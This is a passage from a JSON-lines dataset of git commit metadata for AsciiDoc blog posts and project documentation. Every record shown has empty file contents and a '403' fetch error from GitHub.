unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3ef0b13f378cc24385f925e4440870a6aafefdc","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21dac99c1ee129e075b8ac91c885f4413af4d29e","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcab44eab9ca0f8dff2f0d3906f3852fcbc264af","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48dde5848878495f5e259eb1598096b05493b795","subject":"Update 2020-04-05-reveal.adoc","message":"Update 2020-04-05-reveal.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-04-05-reveal.adoc","new_file":"_posts\/2020-04-05-reveal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2cfbe5f64ff4e219c72f62a3f7c327e222e694b","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"290afa3d6173fabb4d98d9f11508d3e169b47177","subject":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","message":"Update 2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_file":"_posts\/2019-01-31-Using-a-Raspberry-Pi-for-live-TV-streaming-IPTV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0aa82e5bf8808f29866a376defb5477f1d5d7350","subject":"Doesn't work where no datatypes associated","message":"Doesn't work where no datatypes associated\n\n#CTCTOWALTZ-1950\n#5085\n","repos":"khartec\/waltz,kamransaleem\/waltz,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,davidwatkins73\/waltz-dev,khartec\/waltz,kamransaleem\/waltz,khartec\/waltz,davidwatkins73\/waltz-dev,kamransaleem\/waltz,kamransaleem\/waltz,khartec\/waltz","old_file":"docs\/design\/draft\/attestation_permissions\/attestation_permissions.adoc","new_file":"docs\/design\/draft\/attestation_permissions\/attestation_permissions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/khartec\/waltz.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c95fa27168f7233609acc71d05d6ee94e7d236c3","subject":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc2165a9e3801737e0a88258c1f0b33e11020af6","subject":"Added SetProperty EIP docs","message":"Added SetProperty EIP docs\n","repos":"nicolaferraro\/camel,sverkera\/camel,sverkera\/camel,DariusX\/camel,CodeSmell\/camel,curso007\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,apache\/camel,anoordover\/camel,pmoerenhout\/camel,tadayosi\/camel,snurmine\/camel,cunningt\/camel,apache\/camel,nikhilvibhav\/camel,akhettar\/camel,jonmcewen\/camel,jamesnetherton\/camel,adessaigne\/camel,curso007\/camel,alvinkwekel\/camel,sverkera\/camel,tadayosi\/camel,gnodet\/camel,sverkera\/camel,nicolaferraro\/camel,davidkarlsen\/camel,christophd\/camel,ullgren\/camel,ullgren\/camel,adessaigne\/camel,kevinearls\/camel,christophd\/camel,adessaigne\/camel,anoordover\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,snurmine\/camel,dmvolod\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,tadayosi\/camel,mcollovati\/camel,CodeSmell\/camel,apache\/camel,curso007\/camel,gautric\/camel,christophd\/camel,alvinkwekel\/camel,gautric\/camel,jonmcewen\/camel,pmoerenhout\/camel,onders86\/camel,tdiesler\/camel,DariusX\/camel,Fabryprog\/camel,cunningt\/camel,cunningt\/camel,cunningt\/camel,mcollovati\/camel,zregvart\/camel,tdiesler\/camel,nicolaferraro\/camel,pax95\/camel,pmoerenhout\/camel,curso007\/camel,apache\/camel,jonmcewen\/camel,onders86\/camel,pax95\/camel,apache\/camel,tdiesler\/camel,gautric\/camel,pax95\/camel,davidkarlsen\/camel,dmvolod\/camel,kevinearls\/camel,davidkarlsen\/camel,kevinearls\/camel,gautric\/camel,christophd\/camel,akhettar\/camel,zregvart\/camel,gnodet\/camel,zregvart\/camel,Fabryprog\/camel,jamesnetherton\/camel,gautric\/camel,anoordover\/camel,cunningt\/camel,onders86\/camel,adessaigne\/camel,sverkera\/camel,nikhilvibhav\/camel,tdiesler\/camel,mcollovati\/camel,anoordover\/camel,gnodet\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,pax95\/camel,ullgren\/camel,DariusX\/camel,anoordover\/camel,pmoerenhout\/camel,Fabryprog\/camel,akhettar\/camel,DariusX\/camel,christophd\/camel,mcollovati\/camel,pmoerenhout\/camel,ullgren\/camel,tadayosi\/camel,gautric\/camel,kevinearls\/camel,objectiser\/camel,dmvolod\/camel,jamesnetherton\/camel,snurmine\/camel,onders86\/camel,akhettar\/camel,gnodet\/camel,snurmine\/camel,punkhorn\/camel-upstream,gnodet\/camel,alvinkwekel\/camel,curso007\/camel,objectiser\/camel,jonmcewen\/camel,snurmine\/camel,akhettar\/camel,anoordover\/camel,dmvolod\/camel,tdiesler\/camel,jonmcewen\/camel,adessaigne\/camel,pmoerenhout\/camel,onders86\/camel,CodeSmell\/camel,snurmine\/camel,Fabryprog\/camel,objectiser\/camel,cunningt\/camel,onders86\/camel,dmvolod\/camel,zregvart\/camel,davidkarlsen\/camel,kevinearls\/camel,jamesnetherton\/camel,tadayosi\/camel,CodeSmell\/camel,sverkera\/camel,objectiser\/camel,kevinearls\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,apache\/camel,nikhilvibhav\/camel,akhettar\/camel,curso007\/camel,tdiesler\/camel,dmvolod\/camel,pax95\/camel,pax95\/camel,jamesnetherton\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/setProperty-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/setProperty-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59394afda09c03b5abd89e2e6cefb9fb76afcb56","subject":"y2b create post Deal Therapy: Amazing Headphones Deal, Sharp 40-inch LED TV Under $400 \\u0026 MORE!","message":"y2b create post Deal Therapy: Amazing Headphones Deal, Sharp 40-inch LED TV Under $400 \\u0026 MORE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-01-Deal-Therapy-Amazing-Headphones-Deal-Sharp-40inch-LED-TV-Under-400-u0026-MORE.adoc","new_file":"_posts\/2013-03-01-Deal-Therapy-Amazing-Headphones-Deal-Sharp-40inch-LED-TV-Under-400-u0026-MORE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"401cda92506236f5e723a364920f6f5cc232553e","subject":"Add documentation of schedule exceptions","message":"Add documentation of schedule exceptions\n","repos":"cvut\/sirius,cvut\/sirius","old_file":"docs\/schedule-exceptions.adoc","new_file":"docs\/schedule-exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cvut\/sirius.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37a57334107a1349ef0de80b2a9ab93400dd82a7","subject":"CL: Using ql:*local-project-directories* to load Quicklisp project from a specific location","message":"CL: Using ql:*local-project-directories* to load Quicklisp project from\na specific location\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"85a2babb0a88e9131dbd7b2e030c2a65e4fbf665","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a12c59a8ec55c4e762aa8c68cf734f82f1f503","subject":"y2b create post When You See It...","message":"y2b create post When You See It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-04-When-You-See-It.adoc","new_file":"_posts\/2017-07-04-When-You-See-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc286268cbb0a0683bf7ab6276c5a7b5459d6ec3","subject":"add a redme","message":"add a redme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-karma-repository\/README.adoc","new_file":"plugins\/boteco-plugin-karma-repository\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e931fa5d7cdd3924468d70d5c2f76da223fd70f5","subject":"Update 2017-03-25-Get-started-with-Merlin-speech-synthesis-toolkit.adoc","message":"Update 2017-03-25-Get-started-with-Merlin-speech-synthesis-toolkit.adoc","repos":"ronanki\/ronanki.github.io,ronanki\/ronanki.github.io,ronanki\/ronanki.github.io,ronanki\/ronanki.github.io","old_file":"_posts\/2017-03-25-Get-started-with-Merlin-speech-synthesis-toolkit.adoc","new_file":"_posts\/2017-03-25-Get-started-with-Merlin-speech-synthesis-toolkit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ronanki\/ronanki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd0a8f0690f7eae2b630ed93fccffbed6b8cadf5","subject":"y2b create post Casio G-Shock GB-6900 Bluetooth Smart Watch CES 2012","message":"y2b create post Casio G-Shock GB-6900 Bluetooth Smart Watch CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-22-Casio-GShock-GB6900-Bluetooth-Smart-Watch-CES-2012.adoc","new_file":"_posts\/2012-01-22-Casio-GShock-GB6900-Bluetooth-Smart-Watch-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaa867f471ecc961a4bda043b830145a9130479e","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40c79d4892b778f66f14dbaae8dd6a6fe3e02109","subject":"Update 2016-04-03-Cache-in-Gitlab-C-I.adoc","message":"Update 2016-04-03-Cache-in-Gitlab-C-I.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2016-04-03-Cache-in-Gitlab-C-I.adoc","new_file":"_posts\/2016-04-03-Cache-in-Gitlab-C-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce6b130d268adaa5aa116a462aacf17e080c22f5","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d3de9475d4fcc9af037fe5297e1b06c2fce0621","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28b1e63e06dbc2f635d2d7388d0bfb429e4fa3df","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f84a4461bab2a7485d24abcef726df4e377dc8cb","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38366e1ddf3df5650bb1ad8de99cda11061f2d74","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b160d77e380fdad7941efabad0f3a7373bbb69","subject":"Update 2016-11-09-Eating-Vegan-at-a-Conference.adoc","message":"Update 2016-11-09-Eating-Vegan-at-a-Conference.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-11-09-Eating-Vegan-at-a-Conference.adoc","new_file":"_posts\/2016-11-09-Eating-Vegan-at-a-Conference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ec6181b9f1ccbe3751506ded94b1e2ca5642d2b","subject":"y2b create post The Levitating Light","message":"y2b create post The Levitating Light","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-13-The-Levitating-Light.adoc","new_file":"_posts\/2016-05-13-The-Levitating-Light.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bea7d30231008f671731f7b220e83866c7b25d04","subject":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","message":"Update 2017-05-29-Anaya-Blog-Episode-1.adoc","repos":"harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io,harvard-visionlab\/harvard-visionlab.github.io","old_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_file":"_posts\/2017-05-29-Anaya-Blog-Episode-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harvard-visionlab\/harvard-visionlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e68f9779a0d2241d32dce1f769d878379ea800a4","subject":"Update 2018-10-17-Develop-New-UI-Setup.adoc","message":"Update 2018-10-17-Develop-New-UI-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-10-17-Develop-New-UI-Setup.adoc","new_file":"_posts\/2018-10-17-Develop-New-UI-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e54afffe81c7920c02a0ef16fda99453fbe1001b","subject":"Update 2019-01-31-My-Alt-English-Title.adoc","message":"Update 2019-01-31-My-Alt-English-Title.adoc","repos":"ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress","old_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ml4den\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d237488c508dcaa04fac1da189522d74c5544c4b","subject":"Renamed '_posts\/2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc' to '_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","message":"Renamed '_posts\/2017-08-15-How-to-do-be-great-using-Ansible-Galaxy.adoc' to '_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_file":"_posts\/2017-08-15-How-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0eff7c0b02b1aaee2210c14692e645d8bd98bfbc","subject":"y2b create post 3 Unique Gadgets You Can Buy Right Now","message":"y2b create post 3 Unique Gadgets You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-08-3%20Unique%20Gadgets%20You%20Can%20Buy%20Right%20Now.adoc","new_file":"_posts\/2018-02-08-3%20Unique%20Gadgets%20You%20Can%20Buy%20Right%20Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f8eab824b62eeca296f59b3fc2263d3a1ea0893","subject":"OGM-761 Describing HSEARCH as optional","message":"OGM-761 Describing HSEARCH as optional\n","repos":"uugaa\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,schernolyas\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,uugaa\/hibernate-ogm,hibernate\/hibernate-ogm,jhalliday\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,uugaa\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,tempbottle\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,hibernate\/hibernate-ogm,jhalliday\/hibernate-ogm,tempbottle\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/configuration.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/configuration.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"95ebc594bae24de7b6300d4055336c8c7b91d168","subject":"Add metrics 040 announcement","message":"Add metrics 040 announcement\n","repos":"lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/06\/23\/hawkular-metrics-0-4-0-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/06\/23\/hawkular-metrics-0-4-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0aead2f10458be83edccd787c3ac24426b53bc8","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3365ba3caba9bee3a04c303efb550f8b2411c42c","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 